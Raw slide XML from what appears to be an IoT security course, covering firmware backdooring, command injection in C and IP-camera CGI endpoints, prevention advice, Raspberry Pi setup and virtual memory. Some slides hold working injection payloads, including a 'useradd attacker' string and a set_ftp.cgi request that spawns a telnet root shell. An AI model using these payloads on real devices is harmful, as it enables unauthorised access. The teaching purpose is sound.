          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="775854" y="1731819"/>
            <a:ext cx="10764982" cy="4474416"/>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Find an init script to insert our backdoor: /etc/init.d/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 Rebuild the firmware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./build-firmware.sh DIR300B5_FW212WWB02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Emulate the firmware using FAT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Remember to wait a few minutes for FW to startup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Connect to listening IP and port using netcat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Nc -nv 192.168.0.1 &lt;port&gt;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173</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271495922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015"/>
            <a:ext cx="10205884" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Finding command injection attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="817417" y="1692911"/>
            <a:ext cx="10867225" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Static analysis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Run </a:t>
            </a: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binwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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View code files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Find how input is being handled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Test via dynamic analysis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Emulate firmware if possible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Run basic shell commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">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Ping, telnet, etc...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Listen for packets if a parameter is vulnerable to “blind” command injection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Tcpdump host &lt;target device IP&gt; and icmp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174</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34708021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67" y="16014"/>
            <a:ext cx="11921065" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Finding command injection attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020417" y="1875473"/>
            <a:ext cx="10628243" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;string.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;stdlib.h&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;stdio.h&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Injection Payload: any_cmd ‘happy'; useradd 'attacker’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>enum { BUFFERSIZE = 512 }; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void func(const char *input) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  char cmdbuf[BUFFERSIZE]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  int len_wanted = snprintf(cmdbuf, BUFFERSIZE, "any_cmd '%s'", input); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  if (len_wanted &gt;= BUFFERSIZE) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  } else if (len_wanted &lt; 0) { /* Handle error */ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  } else if (system(cmdbuf) == -1) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    /* Handle error */ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}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175</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41911030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 y="32382"/>
            <a:ext cx="11582399" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Finding command injection attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422787" y="1942045"/>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/set_ftp.cgi?next_url=ftp.htm&amp;loginuse= admin&amp;loginpas=&amp;svr=192.16 8.1.1&amp;port=21&amp;user=ftp&amp;pwd=$(INSERT SHELLCOMMAND)&amp;dir=/&amp;mode=PORT&amp; u pload_interval=0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/set_ftp.cgi?next_url=ftp.htm&amp;loginuse= admin&amp;loginpas=&amp;svr=192.16 8.1.1&amp;port=21&amp;user=ftp&amp;pwd=$(ping%2 0192.168.1.X)&amp;dir=/&amp;mode=PORT&amp;u pload_interval=0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tcpdump host 192.168.1.177 and icmp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/ftptest.cgi?next_url=test_ftp.htm&amp;login use=admin&amp;loginpas=admin'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/set_ftp.cgi?next_url=ftp.htm&amp;loginuse= admin&amp;loginpas=&amp;svr=192.16 8.1.1&amp;port=21&amp;user=ftp&amp;pwd=$(telnetd -p25 -l/bin/sh)&amp;dir=/&amp;mode=PORT&amp;u pload_interval=0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Telnet to camera: telnet 192.168.1.177 25 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:endParaRPr lang="en-US"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176</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3115071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7853"/>
            <a:ext cx="10471355" cy="981961"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Preventing command injection attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914399" y="1875473"/>
            <a:ext cx="10772172" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Whitelist accepted commands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Whitelist trusted JavaScript files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Content-security-policy</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Avoid using user data into operation system commands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Validate user input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Context output encode characters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Use a number to command list and validate number rather than shell commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:endParaRPr lang="en-US" sz="24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177</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232137575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12541"/>
            <a:ext cx="11305622" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Some practical stuff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1257300"/>
            <a:ext cx="11427542" cy="5099051"/>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On raspberry pi, the file system is usually on  an SD card.  You need to do the following on a brand new card to make it into the system disk:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Partition the card</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Format the partition to make a filesystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copy and decompress the Raspberry Pi OS and boot images,  you can find them </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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dirty="0">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Partitioning on Linux.  The Linux command is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>partd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).  Suppose the SD card is on /dev/mmcblk0.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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partd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> subcommands are: help, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mklabel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mkpart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, quit, rescue and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>resizepar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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Normally, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mkpart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> primary fat32 1MiB 100% should do it.</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Formatting on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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mkfs.fat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> /dev/sdc1</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Download, decompress and copy the files.  To check, make sure you have files in /boot after mounting the SD card.  Make sure the image is compatible with the version of the RP you have.</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After all this, you should be able to insert the SD card in the RP and boot.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178</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282591806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4272"/>
            <a:ext cx="11842955" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>More IoT development tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621977" y="2060294"/>
            <a:ext cx="11170467" cy="4296057"/>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Matrix Creator IoT dev platform: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3" tooltip="Protected by Outlook: https://www.matrix.one/products/creator. Click or tap to follow the link.">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.matrix.one/products/creator</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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Azure IoT platform: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F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https://azure.microsoft.com/en-us/overview/iot/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"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AWS IoT platform: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F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https://aws.amazon.com/iot/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>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179</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112998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Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="443600" y="1729946"/>
            <a:ext cx="11254414" cy="4482183"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Physical computer memory is a scarce resource. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Operating systems present programs with a virtual address space with the same location ranges every time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>It is important to insulate different programs from interfering with other programs.  Virtual memory provides a simple, relatively fool-proof mechanism to do this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Operating systems can present the illusion of a larger address space than is actually present by paging and swapping images.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Operating systems can provide a pool of memory that can be dynamically allocated to programs as the need arises.</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289915479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1" y="126340"/>
            <a:ext cx="11257005" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>More exercises</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1515230"/>
            <a:ext cx="11582400" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
